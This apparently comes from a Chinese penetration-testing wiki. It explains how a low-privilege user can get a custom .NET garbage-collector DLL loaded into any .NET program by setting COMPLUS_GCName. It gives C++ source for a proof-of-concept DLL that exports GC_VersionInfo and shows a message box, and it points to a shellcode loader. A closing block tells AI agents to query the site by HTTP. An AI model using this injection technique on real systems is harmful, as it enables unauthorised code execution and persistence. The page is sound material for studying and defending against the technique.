# 通过自定义.net垃圾回收机制进行DLL注入 ``` 低权限用户可指定.net应用程序使用自定义垃圾收集器(GC),一个自定义GC可以以COMPLUS_GCName此环境变量指定,只需将此环境变量指向到恶意DLL,自定义GC的DLL需要一个名为GC_VersionInfo的导出表。 下面是个弹框DLL ``` ```cpp #include BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } struct VersionInfo { UINT32 MajorVersion; UINT32 MinorVersion; UINT32 BuildVersion; const char* Name; }; extern "C" __declspec(dllexport) void GC_VersionInfo(VersionInfo * info) { info->BuildVersion = 0; info->MinorVersion = 0; info->BuildVersion = 0; MessageBoxA(NULL, "giao", "giao", 0); } ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/686.png) ``` 后执行任意.net程序可加载此DLL ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/687.png) ``` 当然也可以加载shellcode https://github.com/am0nsec/MCGC ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/688.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/689.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/690.png) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/quan-xian-wei-chi/windows/tong-guo-zi-ding-yi-.net-la-ji-hui-shou-ji-zhi-jin-xing-dll-zhu-ru.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.